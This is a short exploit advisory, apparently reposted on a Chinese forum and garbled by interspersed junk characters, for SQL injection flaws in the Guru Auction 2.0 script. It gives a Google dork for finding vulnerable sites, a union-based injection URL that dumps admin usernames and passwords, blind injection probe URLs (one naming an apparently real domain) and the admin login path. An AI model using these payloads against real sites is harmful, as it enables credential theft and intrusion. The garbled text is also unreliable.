Guru Auction 2.0 Multiple SQL Injection Vulnerabilities' F6 _) y# R2 q1 v) R, p
2 v! Q3 A/ |1 M3 y作者 : v3n0m
7 r; V9 F# F1 i应用 : Guru Auction 2.0 o- q- F8 Q9 J' n% y+ ?
Price : $49! \1 r7 Y! N- q n9 U9 n, o9 I w
Vendor : http://www.guruscript.com/
- U3 M8 }& j! fGoogle Dork : inurl:subcat.php?cate_id=0 {# g* u0 S; j3 Y4 h
; |, R8 d3 A" H ?
SQLi p0c:
/ G4 ^( L/ P' V8 `3 A- k~~~~~~~~~~( h' G( g5 G4 ^0 |" z) d
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
v+ _. g0 s. {* K4 G ; ?. c- `0 k4 Q# q8 i& h e2 _2 [( J2 x
9 v/ S! H$ y# E+ A' C& I% \盲注 p0c:
8 A8 ?6 M' F0 T: Z) k~~~~~~~~~~ E: h- t! i7 f% r9 |
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
. p* M' c" o: W* n3 v8 n' w) a+ k/ Chttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false+ v, x& S8 j, \# Y+ {5 m
1 V3 V5 p0 J! Q0 E, G2 f- S管理登录入口:, F7 m! H6 _# Y: f" E2 G
~~~~~~~~~~
! q- ~0 N7 d, s5 o- l' uhttp://domain.tld/[path]/admin/4 C' N$ j& x; L3 R/ |6 t; `# j+ `
|